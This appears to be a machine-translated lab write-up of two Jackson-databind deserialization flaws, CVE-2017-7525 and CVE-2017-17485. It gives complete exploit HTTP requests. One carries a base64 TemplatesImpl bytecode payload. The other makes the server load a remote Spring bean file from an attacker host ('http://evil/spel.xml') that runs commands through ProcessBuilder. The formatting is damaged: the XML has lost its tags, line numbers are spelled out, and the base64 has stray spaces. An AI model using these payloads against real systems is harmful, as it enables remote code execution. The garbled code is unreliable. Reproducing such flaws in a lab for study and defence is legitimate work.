Jackson-databind 反序列化漏洞（CVE-2017-7525）

Jackson-databind supports the Polymorphic Deserialization feature (not enabled by default). When there are polymorph fields in the Target class converted by json string, that is, when the field type is interface, abstract class or Object type, the attacker can instantiate the specified class by specifying the specific type of the variable (subclass or interface implementation class) in the json string. With the help of some special classes, such as TemplatesImpl, arbitrary code execution can be implemented.

Therefore, the exploit conditions of this vulnerability are as follows:

Turn on JacksonPolymorphicDeserialization, that is, call any of the following methods

1

2

objectMapper.enableDefaultTyping(); //default to using DefaultTyping.OBJECT_AND_NON_CONCRETE

objectMapper.enableDefaultTyping(ObjectMapper.DefaultTyping.NON_FINAL);

Target class requires a constructor

The Target class needs to have field types Interface, abstract class, and Object, and the Gadget used needs to subclass/implement interfaces for its

CVE-2017-7525

When Jackson-databind sets the parameter value of the Target class member variable, if there is no corresponding getter method, it will use SetterlessProperty to call the getter method, get the variable, and then set the variable value. When the getOutputProperties() method is called, the class that translateBytecodes contains bytecode will be initialized, causing the command to be executed. For details, please refer to the instructions on TemplatesImpl in java-deserialization-jdk7u21-gadget-note.

Use com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl in JDK7u21 as Gadget, send the following request, and will execute touch /tmp/prove1.txt:

1

2

3

4

5

6

7

8

9

10

11

12

13

14

15

16

17

18

19

20

twenty one

twenty two

POST /exploit HTTP/1.1

Host: your-ip:8080

Accept-Encoding: gzip, deflate

Accept: */*

Accept-Language: en

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)

Connection: close

Content-Type: application/json

Content-Length: 1298

{

'param': [

'com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl',

{

'transletBytecodes': [

'yv66vgAAADMAKAoABAAUCQADABUHABcBAAVwYXJhbQEAEkxqYXZhL2xhbmcvT2JqZWN0OwEABjxpbml0PgEAAygpVgEABENvZGUBAA9MaW5lTnVtYmVyVGFibGUBABJMb2N hbFZhcmmlhYmxlVGFibGUBAAR0aGlzAQAcTGNvbS9iMW5nei9zZWMvbW9kZWwvVGFyZ2V0OwEACGdldFBhcmFtAQAUKClMamF2YS9sYW5nL09iamVjdDsBAAhzZXRQYXJhbQEAFSh MamF2YS9sYW5nL09iamVjdDspVgEAClNvdXJjZUZpbGUBAAtUYXJnZXQuamF2YQwABwAIDAAFAAYBABpjb20vYjFuZ3ovc2VjL21vZGVsL1RhcmdldAEAEGphdmEvbGFuZy9PYmp lY3QBAAg8Y2xpbml0PgEAEWphdmEvbGFuZy9SdW50aW1lBwAZAQAKZ2V0UnVudGltZQEAFSgpTGphdmEvbGFuZy9SdW50aW1lOwwAGwAcCgAaAB0BABV0b3VjaCAvdG1wL3Byb3Zl MS50eHQIAB8BAARleGVjAQAnKExqYXZhL2xhbmcvU3RyaW5nOylMamF2YS9sYW5nL1Byb2Nlc3M7DAAhACIKABoAIwEAQGNvbS9zdW4vb3JnL2FwYWNoZS94YWxhbi9pbnRlcm5h bC94c2x0Yy9ydW50aW1lL0Fic3RyYWN0VHJhbnNsZXQHACUKACYAFAAhAAMAJgAAAAEAAgAFAAYAAAAEAAEABwAIAAEACQAAAC8AAQABAAAABSq3ACexAAAAAgAKAAAABgABAAAA BgALAAAADAABAAAABQAMAA0AAAABAA4ADwABAAKAAAAvAAEAAQAAAAUqtAACsAAAAAAAIACgAAAAAAYAAQAAAAOACwAAAAAWAAQAAAAAAWAAQAAAAAAAAAAAAAAA Kiu1AAKxAAAAAgAKAAAACgACAAAADgAFAA8ACwAAABYAAgAAAAYADAANAAAAAAAGAAUABgABAAgAGAAIAAEACQAAABYAAgAAAAAACrgAHhIgtgAkV7EAAAAAAAEAEgAAAAIAEw=='

],

'transletName': 'a.b',

'outputProperties': {}

}

]

}

This POC can only run in an environment with the target JDK7u21 or below, and other cases require replacement of Gadget.

CVE-2017-17485

CVE-2017-7525 blacklist fixes bypassing, using org.springframework.context.support.FileSystemXmlApplicationContext. Taking advantage of this vulnerability, we need to create a bean file and place it on any server, such as http://evil/spel.xml, the content is as follows:

1

2

3

4

5

6

7

8

9

10

11

12

13

14

15

16

beans xmlns='http://www.springframework.org/schema/beans'

xmlns:xsi='http://www.w3.org/2001/XMLSchema-instance'

xsi:schemaLocation='

http://www.springframework.org/schema/beans

http://www.springframework.org/schema/beans/spring-beans.xsd

'

bean id='pb' class='java.lang.ProcessBuilder'

constructor-arg

array

valuetouch/value

value/tmp/prove2.txt/value

/array

/constructor-arg

property name='any' value='#{ pb.start() }'/

/bean

/beans

Then, send the following packets to make Jackson load the bean and trigger the vulnerability:

1

2

3

4

5

6

7

8

9

10

11

12

13

14

15

16

POST /exploit HTTP/1.1

Host: your-ip:8080

Accept-Encoding: gzip, deflate

Accept: */*

Accept-Language: en

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)

Connection: close

Content-Type: application/json

Content-Length: 138

{

'param': [

'org.springframework.context.support.FileSystemXmlApplicationContext',

'http://IP/evil.xml'

]

}

Successfully executed touch /tmp/prove2.txt:

Principle: Use FileSystemXmlApplicationContext to load the remote bean definition file, create a ProcessBuilder bean, and use Spring EL in the xml file to call the start() method to implement command execution